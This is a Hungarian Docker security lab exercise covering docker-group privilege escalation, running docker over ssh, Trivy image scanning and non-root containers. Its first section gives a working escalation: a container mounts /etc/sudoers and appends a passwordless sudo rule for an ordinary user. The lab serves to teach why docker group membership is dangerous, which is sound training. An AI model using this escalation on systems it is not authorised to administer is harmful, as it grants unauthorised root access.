# Dokcer Demó - 21. feladat

> ***Security***

## Docker csoporttagság

Hozzunk létre egy ***tesztelek*** nevű felhasználót, adjunk neki egy jelszót, és adjuk hozzá a ***docker*** group-hoz

```
useradd -m tesztelek -G docker
passwd tesztelek
```

Váltsunk át **tesztelek** felhasználóra és nézzük meg, van-e sudo joga

```
su - tesztelek
sudo su -
cat /etc/sudoers
```

***FYI!*** Nincs sudo joga.

Indítsunk egy alpine konténert és csatoljuk fel a ***/etc/sudoers*** fájlt a ***/tmp*** alá

```
docker run -d -it --name=hack -v /etc/sudoers:/tmp/sudoers alpine
```

Lépjünk be a ***hack*** konténerbe és módosítsuk a ***/tmp/sudoers*** fájlt.

```
docker exec -it hack sh
echo 'tesztelek    ALL=(ALL)       NOPASSWD: ALL' >> /tmp/sudoers
```

Lépjünk ki a ***hack*** konténerből és töröljük el

```
exit
docker rm -f hack
```

Ellenőrizzük, hogy hozzáférünk-e a sudoers fájlhoz, és van-e sudo jogunk.

```
cat /etc/sudoers
sudo su -
```

Váltsunk vissza root felhasználó-ra.

```
exit
```

## Docker használata ssh-n keresztül

Kapcsoljuk be a ***kuma-01*** gépet, lépjünk be rá és ellenőrizzük, hogy működik-e a kucslos ssh kapcsolódás a ***kuwo-01*** gépre.

```
ssh root@kuwo-01
exit
```

Indítsunk egy ***nginx*** konténert ssh-n keresztül a távoli ***kuwo-01*** gépen.

```
docker -H ssh://root@kuwo-01 run -d --name=nginx -p 80:80 nginx
```

Kérdezzük le, hogy milyen image és milyen futó docker konténer van a ***kuma-01*** gépen.

```
docker images
docker ps -a
```
***FYI!*** A ***kuma-01*** gépen nincs letöltött image és futó konténer! A konténer és az image a távoli ***kuwo-01*** gépen jött létre!

Ellenőrizzük egy web böngészőből, hogy működik-e a távoli ***kuwo-01*** gépen az nginix konténer!

Ellenőrizzük a ***kuma-01*** gépről, hogy fut-e a távoli ***kuwo-01*** gépen a konténer.

```
export DOCKER_HOST=ssh://root@kuwo-01
docker images
docker ps
```

***FYI!*** A docker parancsok a távoli gépen ssh-n keresztül hajtódnak végre! 


Állítsuk le a ***kuma-01***-es gépet és lépjünk vissza a ***kuwo-01***-re.



## Docker Image ellenőrzése

Telepítsük a Tryvi security scannert

```
rpm -ivh https://github.com/aquasecurity/trivy/releases/download/v0.30.2/trivy_0.30.2_Linux-64bit.rpm
```

Ellenőrizzük az nginx image sérülékenységeit

```
trivy image nginx
```

Kérjük le csak a ***HIGH** típusú sérülékenységeket

```
trivy image --severity HIGH nginx
```

Vizsgáljunk meg egy letöltött tar formátumú image fájlt trivy-vel.

```
docker pull ubuntu
docker save ubuntu -o ubuntu.tar
trivy image --input ubuntu.tar
```

Script-ből történő feldolgozáshoz kérjük le json formátumba az eredményt

```
trivy image -f json nginx
```

Formázzuk meg a kimenetet ***jq***-val, hogy összesítse ***severity*** szerint a sérülékenységeket.

```
trivy image -f json nginx | jq '.Results[].Vulnerabilities[].Severity' |sort | uniq -c
```

Ellenőriztessük a trivy-vel a wordpress image-hez készült Dockerfile-t.

```
trivy filesystem /oktatas/docker/demo-wordpress/build/
```

## Konténer indítása nem root felhasználóval

Indítsuk el egy alpine konténert és kérdezzük le milyen felhasználó nevében fut

```
docker run -d -it --name=alpine-root alpine whoami
docker logs alpine-root
```

Indítsuk el egy alpine konténert ***nobody*** user és ellenőrizzük a logot

```
docker rm alpine-root
docker run -d -it --name=alpine-nobody -u nobody alpine whoami
docker logs alpine-nobody
```

***FYI!*** CSAK olyan felhasználó nevében lehet konténert futtatni, aki létező felhasználó az image-ben (cat /etc/passwd)
